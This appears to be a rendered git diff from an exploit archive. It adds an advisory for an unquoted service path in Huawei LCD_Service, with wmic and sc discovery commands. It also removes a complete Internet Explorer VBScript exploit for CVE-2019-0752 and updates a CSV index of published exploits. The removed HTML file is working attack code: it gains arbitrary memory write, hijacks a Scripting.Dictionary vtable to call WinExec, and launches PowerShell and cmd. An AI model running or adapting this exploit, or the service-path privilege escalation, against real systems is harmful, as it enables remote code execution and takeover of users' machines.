||||
# Tested on: Windows 10 Home Single Language x64 Esp
|
||||
|
||||
# Step to discover the unquoted Service:
|
||||
|
||||
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
|
||||
|
||||
# Service info:
|
||||
|
||||
Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto
|
||||
|
||||
C:\Users\gerar>sc qc "LCD_Service"
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: LCD_Service
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
|
||||
GRUPO_ORDEN_CARGA :
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : Huawei LCD_Service
|
||||
DEPENDENCIAS :
|
||||
NOMBRE_INICIO_SERVICIO: LocalSystem
|
||||
|
||||
# A successful attempt would require the local user to be able to insert their code in the system root path
|
||||
# undetected by the OS or other security applications where it could potentially be executed during
|
||||
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
||||
# privileges of the application.
|
|
@ -1,130 +0,0 @@
|
|||
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->
|
||||
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->
|
||||
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->
|
||||
|
||||
<!-- Tgroupcrew@gmail.com -->
|
||||
|
||||
<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->
|
||||
<!-- all the way to RCE using no shellcode. -->
|
||||
|
||||
<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->
|
||||
<!-- (h/t: James Forshaw, Google Project Zero) -->
|
||||
|
||||
<html>
|
||||
<meta http-equiv="x-ua-compatible" content="IE=8">
|
||||
<meta http-equiv="Expires" content="-1">
|
||||
<body>
|
||||
<div id="container1" style="overflow:scroll; width: 10px">
|
||||
<div id="content1" style="width:5000000px">
|
||||
Content
|
||||
</div>
|
||||
</div>
|
||||
<script language="VBScript.Encode">
|
||||
Dim ar1(&h3000000)
|
||||
Dim ar2(1000)
|
||||
Dim gremlin
|
||||
addressOfGremlin = &h28281000
|
||||
Class MyClass
|
||||
Private mValue
|
||||
Public Property Let Value(v)
|
||||
mValue = v
|
||||
End Property
|
||||
Public Default Property Get P
|
||||
P = mValue ' Where to write
|
||||
End Property
|
||||
End Class
|
||||
Sub TriggerWrite(where, val)
|
||||
Dim v1
|
||||
Set v1 = document.getElementById("container1")
|
||||
v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd)
|
||||
Dim c
|
||||
Set c = new MyClass
|
||||
c.Value = where
|
||||
Set v1.scrollLeft = c
|
||||
End Sub
|
||||
' Our vulnerability does not immediately give us an unrestricted
|
||||
' write (though we could manufacture one). For our purposes, the
|
||||
' following is sufficient. It writes an arbitrary DWORD to an
|
||||
' arbitrary location, and sets the subsequent 3 bytes to zero.
|
||||
Sub WriteInt32With3ByteZeroTrailer(addr, val)
|
||||
TriggerWrite addr , (val) AND &hff
|
||||
TriggerWrite addr + 1, (val\&h100) AND &hff
|
||||
TriggerWrite addr + 2, (val\&h10000) AND &hff
|
||||
TriggerWrite addr + 3, (val\&h1000000) AND &hff
|
||||
End Sub
|
||||
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
|
||||
For i = 0 To Len(str) - 1
|
||||
TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
|
||||
Next
|
||||
End Sub
|
||||
Function ReadInt32(addr)
|
||||
WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
|
||||
ReadInt32 = ar1(gremlin)
|
||||
End Function
|
||||
Function LeakAddressOfObject(obj)
|
||||
Set ar1(gremlin + 1) = obj
|
||||
LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
|
||||
End Function
|
||||
Sub Exploit()
|
||||
' Corrupt vt of one array element (the "gremlin")
|
||||
TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4
|
||||
For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
|
||||
If Not IsEmpty(ar1(i)) Then
|
||||
gremlin = i
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
|
||||
If IsEmpty(gremlin) Then
|
||||
MsgBox "Could not find gremlin"
|
||||
Exit Sub
|
||||
End If
|
||||
|
||||
For i = 0 To UBound(ar2)
|
||||
Set ar2(i) = CreateObject("Scripting.Dictionary")
|
||||
Next
|
||||
|
||||
Set dict = ar2(UBound(ar2) / 2)
|
||||
addressOfDict = LeakAddressOfObject(dict)
|
||||
vtableOfDict = ReadInt32(addressOfDict)
|
||||
scrrun = vtableOfDict - &h11fc
|
||||
kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
|
||||
winExec = kernel32 + &h5d380
|
||||
|
||||
dict.Exists "dummy" ' Make a dispatch call, just to populate pld
|
||||
' Relocate pld to ensure its address doesn't contain a null byte
|
||||
pld = ReadInt32(addressOfDict + &h3c)
|
||||
fakePld = &h28281020
|
||||
For i = 0 To 3 - 1
|
||||
WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
|
||||
Next
|
||||
|
||||
fakeVtable = &h28282828 ' ASCII "(((("
|
||||
For i = 0 To 21
|
||||
If i = 12 Then ' Dictionary.Exists
|
||||
fptr = winExec
|
||||
Else
|
||||
fptr = ReadInt32(vtableOfDict + 4 * i)
|
||||
End If
|
||||
WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
|
||||
Next
|
||||
|
||||
WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
|
||||
WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
|
||||
WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
|
||||
|
||||
On Error Resume Next
|
||||
dict.Exists "dummy" ' Wheeee!!
|
||||
|
||||
' A little cleanup to help prevent crashes after the exploit
|
||||
For i = 1 To 3
|
||||
WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
|
||||
WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
|
||||
Next
|
||||
Erase Dict
|
||||
Erase ar2
|
||||
End Sub
|
||||
Exploit
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
|
@ -10379,7 +10379,7 @@ id,file,description,date,author,type,platform,port
|
|||
48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows,
|
||||
48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows,
|
||||
48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux,
|
||||
48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows,
|
||||
49062,exploits/windows/local/49062.txt,"Microsoft Internet Explorer 11 - Use-After-Free",2020-11-17,maxpl0it,local,windows,
|
||||
48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
|
||||
48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
|
||||
48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
|
||||
|
@ -11198,6 +11198,7 @@ id,file,description,date,author,type,platform,port
|
|||
48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
|
||||
48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
|
||||
48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows,
|
||||
49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18139,7 +18140,6 @@ id,file,description,date,author,type,platform,port
|
|||
46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
|
||||
46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
|
||||
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
|
||||
46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
|
||||
46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
|
||||
46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
|
||||
46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
|
||||
|
@ -18296,6 +18296,8 @@ id,file,description,date,author,type,platform,port
|
|||
48651,exploits/multiple/remote/48651.txt,"Qmail SMTP 1.03 - Bash Environment Variable Injection",2020-07-08,1F98D,remote,multiple,
|
||||
48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows,
|
||||
48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
|
||||
49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple,
|
||||
49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40868,11 +40870,14 @@ id,file,description,date,author,type,platform,port
|
|||
49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,
|
||||
49046,exploits/php/webapps/49046.txt,"Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)",2020-11-16,"Matthew Aberegg",webapps,php,
|
||||
49048,exploits/php/webapps/49048.txt,"Water Billing System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49051,exploits/php/webapps/49051.txt,"Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49059,exploits/php/webapps/49059.txt,"Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection",2020-11-17,"Ramil Mustafayev",webapps,php,
|
||||
49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,
|
||||
49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,
|
||||
49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49056,exploits/php/webapps/49056.txt,"Car Rental Management System 1.0 - 'car_id' Sql Injection",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49058,exploits/php/webapps/49058.txt,"EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass",2020-11-17,"Kislay Kumar",webapps,php,
|
||||
49060,exploits/php/webapps/49060.txt,"SugarCRM 6.5.18 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
|
||||
49061,exploits/php/webapps/49061.txt,"WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
@ -43290,3 +43295,4 @@ id,file,description,date,author,type,platform,port
|
|||
48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,
|
||||
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
|
||||
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
|
||||
49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue